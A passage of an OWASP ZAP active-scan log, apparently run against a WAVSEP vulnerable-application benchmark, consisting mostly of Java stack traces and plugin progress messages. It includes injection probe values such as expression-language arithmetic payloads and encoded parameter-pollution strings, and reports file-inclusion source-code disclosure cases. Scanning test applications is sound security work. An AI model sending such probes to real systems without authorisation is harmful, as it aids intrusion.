org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 10107625 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${680512+335573}] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 10109236 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin - Expression Language Injection vulnerability check failed for parameter [target] and payload [${434213+983584}] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/${434213+983584} at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesBeta.ExpressionLanguageInjectionPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 10115263 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | ExpressionLanguageInjectionPlugin in 149.181s 10115263 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | BackupFileDisclosure strength LOW threshold MEDIUM 10192491 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 10192491 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 10192497 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 10193345 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 10193348 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 10227646 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10227649 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10227652 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10227655 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10227657 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10227660 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10227662 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10227664 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10227666 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10227668 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10227672 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10227674 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10282985 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 10282986 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 10282992 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 10284130 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 10284132 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 10296670 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | BackupFileDisclosure in 181.407s 10296670 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | IntegerOverflow strength LOW threshold MEDIUM 10333750 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10333750 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10333952 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10333952 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10334688 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10334693 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10334693 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10334896 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10334896 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10335096 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10335096 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10335298 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10335298 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10335498 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10335498 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10335699 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10335699 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10335900 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10335900 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10336101 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10336101 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10336302 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10336302 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10336505 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10336506 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10336711 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10336711 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10337335 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10337335 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10337539 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10337539 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10337740 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10337740 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10337939 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10337939 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10338143 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10338143 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10338343 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10338343 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10338542 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10338545 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10338745 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10338745 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10338946 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10338946 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10339147 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10339147 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10339347 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10339347 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10339547 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10339548 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10339748 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10339749 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10339951 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10339951 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10340151 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10340153 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10340352 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10340352 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10340554 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10340554 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10340753 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10340754 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10340956 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10340956 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10341155 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10341156 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10341617 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10382866 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10382866 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10383063 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10383064 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10383266 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10383266 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10383466 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10383466 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10383667 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10383668 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10383868 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10383869 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10384069 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10384069 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10384270 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10384271 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10384472 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10384472 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10384673 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10384673 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10384873 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10384873 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10385075 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10385075 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10385283 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10385284 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10385475 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10385476 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10385676 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10385677 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10385877 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10385879 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10386078 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10386078 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10387201 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10387201 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10387402 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10387402 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10387605 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10398569 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10398572 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10398784 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10398796 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10398968 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10398984 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10399171 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10399171 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10399370 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10404420 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10404438 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10404604 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10404604 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10406414 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10406416 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10426494 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10426899 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10436866 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10437470 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10439479 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10439483 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10452273 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | IntegerOverflow in 155.603s 10452274 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | InsecureHTTPMethod strength LOW threshold MEDIUM 10637904 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | InsecureHTTPMethod in 185.63s 10637904 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | HPP strength LOW threshold MEDIUM 10698921 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesBeta.HPP - Caught java.lang.IllegalStateException unsupported protocol: '172.17.0.2' when accessing: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-POST-302Redirect/Case14-Redirect-RedirectMethod-FilenameContext-HttpInputRemoval-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-POST-302Redirect/none892j3kd.txt%2526zap%253Dzaproxy The target may have replied with a poorly formed redirect due to our input. 10699741 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesBeta.HPP - Caught java.net.UnknownHostException &zap=zaproxy when accessing: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-POST-302Redirect/Case07-Redirect-RedirectMethod-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-PartialPathReq-Read.jsp?target=%2526zap%253Dzaproxy The target may have replied with a poorly formed redirect due to our input. 10702554 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | HPP in 64.65s 10702554 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | UsernameEnumeration strength LOW threshold MEDIUM 10702554 [Thread-66] INFO org.zaproxy.zap.extension.ascanrulesBeta.UsernameEnumeration - There does not appear to be any configured contexts using Form-based Authentication. Further attempts during the current scan will be skipped. 10702557 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - skipped plugin http://172.17.0.2:8080 | UsernameEnumeration in 0.001s 10702557 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SourceCodeDisclosureGit strength LOW threshold MEDIUM 10724920 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | SourceCodeDisclosureGit in 22.363s 10724921 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SourceCodeDisclosureFileInclusion strength LOW threshold MEDIUM 10726438 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10726440 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10726491 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10726496 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10726620 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case64-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10726621 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10726965 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [active/LFI/LFI-Detection-Evaluation-GET-200Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10726966 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10727200 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10727202 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10727217 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10727221 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 10727399 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.SourceCodeDisclosureFileInclusion - Source code disclosure! The output for the source code filename [Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp] differs sufficiently from that of the random parameter, at 29%, compared to a threshold of 75% 10727401 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - 